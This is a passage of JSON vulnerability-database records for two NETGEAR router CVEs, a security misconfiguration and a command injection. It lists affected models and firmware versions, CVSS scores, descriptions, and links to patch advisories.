"version": "1.0.2.94"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.40"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "wnr2020",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.40"
},
{
"model": "wnr2050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.40"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-21230"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d1500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
}
]
},
"cve": "CVE-2018-21230",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2018-21230",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016406",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-21230",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.1,
"id": "CVE-2018-21230",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2018-016406",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21230",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21230",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2018-016406",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2128",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-21230",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-21230"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2128"
},
{
"db": "NVD",
"id": "CVE-2018-21230"
},
{
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR An unspecified vulnerability exists in the device.Information may be obtained and tampered with. Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 prior to 1.0.0.27, D500 prior to 1.0.0.27, D6100 prior to 1.0.0.57, D6220 prior to 1.0.0.40, D6400 prior to 1.0.0.74, D7000 prior to 1.0.1.60, D7800 prior to 1.0.1.34, D8500 prior to 1.0.3.39, DGN2200v4 prior to 1.0.0.94, DGN2200Bv4 prior to 1.0.0.94, EX2700 prior to 1.0.1.42, EX3700 prior to 1.0.0.64, EX3800 prior to 1.0.0.64, EX6000 prior to 1.0.0.24, EX6100 prior to 1.0.2.18, EX6120 prior to 1.0.0.32, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.34_1.0.70, EX6200 prior to 1.0.3.82_1.1.117, EX6400 prior to 1.0.1.78, EX7000 prior to 1.0.0.56, EX7300 prior to 1.0.1., JNR1010v2 prior to 1.1.0.42, JR6150 prior to 1.0.1.10, JWNR2010v5 prior to 1.1.0.42, PR2000 prior to 1.0.0.22, R6050 prior to 1.0.1.10, R6100 prior to 1.0.1.16, R6220 prior to 1.1.0.50, R6250 prior to 1.0.4.14, R6300v2 prior to 1.0.4.12, R6400v2 prior to 1.0.2.34, R6700 prior to 1.0.1.26, R6900 prior to 1.0.1.26, R6900P prior to 1.2.0.22, R7000 prior to 1.0.9.6, R7000P prior to 1.2.0.22, R7100LG prior to 1.0.0.40, R7300DST prior to 1.0.0.54, R7500 prior to 1.0.0.110, R7500v2 prior to 1.0.3.26, R7800 prior to 1.0.2.44, R7900 prior to 1.0.1.26, R8000 prior to 1.0.3.48, R8300 prior to 1.0.2.104, R8500 prior to 1.0.2.104, R9000 prior to 1.0.3.10, WN2000RPTv3 prior to 1.0.1.26, WN2500RPv2 prior to 1.0.1.46, WN3000RPv3 prior to 1.0.2.66, WN3100RPv2 prior to 1.0.0.56, WNDR3400v3 prior to 1.0.1.14, WNDR3700v4 prior to 1.0.2.96, WNDR3700v5 prior to 1.1.0.54, WNDR4300 prior to 1.0.2.98, WNDR4300v2 prior to 1.0.0.48, WNDR4500v3 prior to 1.0.0.48, WNR1000v4 prior to 1.1.0.42, WNR2000v5 prior to 1.0.0.64, WNR2020 prior to 1.1.0.42, and WNR2050 prior to 1.1.0.42",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"db": "VULMON",
"id": "CVE-2018-21230"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21230",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016406",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2128",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-21230",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-21230"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2128"
},
{
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"id": "VAR-202004-1688",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4058950425581394
},
"last_update_date": "2024-11-23T21:59:20.057000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Security Misconfiguration on Some Routers, Gateways, and Extenders, PSV-2016-0117",
"trust": 0.8,
"url": "https://kb.netgear.com/000055104/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0117"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117051"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2128"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000055104/security-advisory-for-security-misconfiguration-on-some-routers-gateways-and-extenders-psv-2016-0117"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21230"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21230"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-21230"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2128"
},
{
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2018-21230"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2128"
},
{
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21230"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2128"
},
{
"date": "2020-04-24T15:15:12.957000",
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-01T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21230"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016406"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2128"
},
{
"date": "2024-11-21T04:03:14.210000",
"db": "NVD",
"id": "CVE-2018-21230"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2128"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016406"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2128"
}
],
"trust": 0.6
}
}
var-202004-1307
Vulnerability from variot
Certain NETGEAR devices are affected by command injection. This affects R6300v2 before 1.0.4.8_10.0.77, R6400 before 1.0.1.24, R6700 before 1.0.1.26, R7000 before 1.0.9.10, R7100LG before 1.0.0.32, R7900 before 1.0.1.18, R8000 before 1.0.3.54, R8500 before 1.0.2.100, and D6100 before 1.0.0.50_0.0.50. plural NETGEAR A device contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6400, etc. are all products of NETGEAR. NETGEAR R6400 is a wireless router. NETGEAR R6700 is a wireless router. NETGEAR D6100 is a wireless modem. The vulnerability stems from the fact that the network system or product does not properly filter special elements in the process of constructing executable commands from external input data. Attackers can use this vulnerability to execute illegal commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1307",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.10"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.100"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.54"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8_10.0.77"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.50_0.0.50"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.50_0.0.50"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8_10.0.77"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.10"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.54"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.100"
},
{
"model": "d6100 \u003c1.0.0.50 0.0.50",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6300v2 \u003c1.0.4.8 10.0.77",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7100lg_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
}
]
},
"cve": "CVE-2017-18794",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18794",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014926",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2021-63372",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.5,
"id": "CVE-2017-18794",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.5,
"id": "CVE-2017-18794",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.4,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014926",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18794",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18794",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014926",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-63372",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1821",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1821"
},
{
"db": "NVD",
"id": "CVE-2017-18794"
},
{
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by command injection. This affects R6300v2 before 1.0.4.8_10.0.77, R6400 before 1.0.1.24, R6700 before 1.0.1.26, R7000 before 1.0.9.10, R7100LG before 1.0.0.32, R7900 before 1.0.1.18, R8000 before 1.0.3.54, R8500 before 1.0.2.100, and D6100 before 1.0.0.50_0.0.50. plural NETGEAR A device contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6400, etc. are all products of NETGEAR. NETGEAR R6400 is a wireless router. NETGEAR R6700 is a wireless router. NETGEAR D6100 is a wireless modem. The vulnerability stems from the fact that the network system or product does not properly filter special elements in the process of constructing executable commands from external input data. Attackers can use this vulnerability to execute illegal commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18794"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "CNVD",
"id": "CNVD-2021-63372"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18794",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-63372",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1821",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1821"
},
{
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"id": "VAR-202004-1307",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
}
],
"trust": 1.1810505236363635
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
}
]
},
"last_update_date": "2024-11-23T22:29:39.114000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Command Injection Vulnerability on D6100 and Some Routers, PSV-2017-0321",
"trust": 0.8,
"url": "https://kb.netgear.com/000049368/Security-Advisory-for-Command-Injection-Vulnerability-on-D6100-and-Some-Routers-PSV-2017-0321"
},
{
"title": "Patch for Command injection vulnerabilities in multiple NETGEAR products (CNVD-2021-63372)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/287146"
},
{
